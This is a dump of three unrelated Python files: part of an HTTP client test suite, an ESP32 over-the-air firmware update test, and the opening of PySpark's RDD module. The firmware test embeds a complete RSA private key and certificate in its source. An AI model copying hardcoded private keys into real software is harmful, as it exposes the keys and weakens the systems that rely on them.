with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/1.1 101'):
# Upgrading to HTTP/2
pass
elif header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['content-type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1, first_line)
self.assertRegexpMatches(first_line[0], 'HTTP/[0-9]\\.[0-9] 200.*\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.lower().startswith('content-type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent', allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
try:
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u("MyUserAgent"), b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers['User-Agent'] = value
resp = self.fetch('/user_agent', headers=headers)
self.assertEqual(
resp.body, b"MyUserAgent",
"response=%r, value=%r, container=%r" %
(resp.body, value, container))
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
stream.write(b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.headers['X-XSS-Protection'], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is not stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(self.get_url('/notfound'), raise_error=False)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
def test_all_methods(self):
for method in ['GET', 'DELETE', 'OPTIONS']:
response = self.fetch('/all_methods', method=method)
self.assertEqual(response.body, utf8(method))
for method in ['POST', 'PUT', 'PATCH']:
response = self.fetch('/all_methods', method=method, body=b'')
self.assertEqual(response.body, utf8(method))
response = self.fetch('/all_methods', method='HEAD')
self.assertEqual(response.body, b'')
response = self.fetch('/all_methods', method='OTHER',
allow_nonstandard_methods=True)
self.assertEqual(response.body, b'OTHER')
def test_body_sanity_checks(self):
# These methods require a body.
for method in ('POST', 'PUT', 'PATCH'):
with self.assertRaises(ValueError) as context:
resp = self.fetch('/all_methods', method=method)
resp.rethrow()
self.assertIn('must not be None', str(context.exception))
resp = self.fetch('/all_methods', method=method,
allow_nonstandard_methods=True)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ('GET', 'DELETE', 'OPTIONS'):
with self.assertRaises(ValueError) as context:
resp = self.fetch('/all_methods', method=method, body=b'asdf')
resp.rethrow()
self.assertIn('must be None', str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != 'GET':
resp = self.fetch('/all_methods', method=method, body=b'asdf',
allow_nonstandard_methods=True)
resp.rethrow()
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch("/redirect?status=307&url=/put",
method="PUT", body=b"hello")
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ in ('TwistedIOLoop',
'AsyncIOMainLoop'):
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
# AsyncIOMainLoop doesn't work with the default policy
# (although it could with some tweaks to this test and a
# policy that created loops for non-main threads).
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop or '
'AsyncIOMainLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
self.server = HTTPServer(app, io_loop=self.server_ioloop)
self.server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
# Delay the shutdown of the IOLoop by one iteration because
# the server may still have some cleanup work left when
# the client finishes with the response (this is noticable
# with http/2, which leaves a Future with an unexamined
# StreamClosedError on the loop).
self.server_ioloop.add_callback(self.server_ioloop.stop)
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://127.0.0.1:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest('http://example.com', headers={'foo': 'bar'})
self.assertEqual(request.headers, {'foo': 'bar'})
def test_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = {'bar': 'baz'}
self.assertEqual(request.headers, {'bar': 'baz'})
def test_null_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = None
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest('http://example.com', body='foo')
self.assertEqual(request.body, utf8('foo'))
def test_body_setter(self):
request = HTTPRequest('http://example.com')
request.body = 'foo'
self.assertEqual(request.body, utf8('foo'))
def test_if_modified_since(self):
http_date = datetime.datetime.utcnow()
request = HTTPRequest('http://example.com', if_modified_since=http_date)
self.assertEqual(request.headers,
{'If-Modified-Since': format_timestamp(http_date)})
class HTTPErrorTestCase(unittest.TestCase):
def test_copy(self):
e = HTTPError(403)
e2 = copy.copy(e)
self.assertIsNot(e, e2)
self.assertEqual(e.code, e2.code)
def test_str(self):
e = HTTPError(403)
self.assertEqual(str(e), "HTTP 403: Forbidden")
|
example_test.py
|
import multiprocessing
import os
import re
import socket
import ssl
from tiny_test_fw import DUT
import ttfw_idf
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, server_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, server_port))
sock.close()
if server_status == 0:
return True
return False
def start_https_server(ota_image_dir, server_ip, server_port, server_file=None, key_file=None):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, 8000) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
thread1.terminate()
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
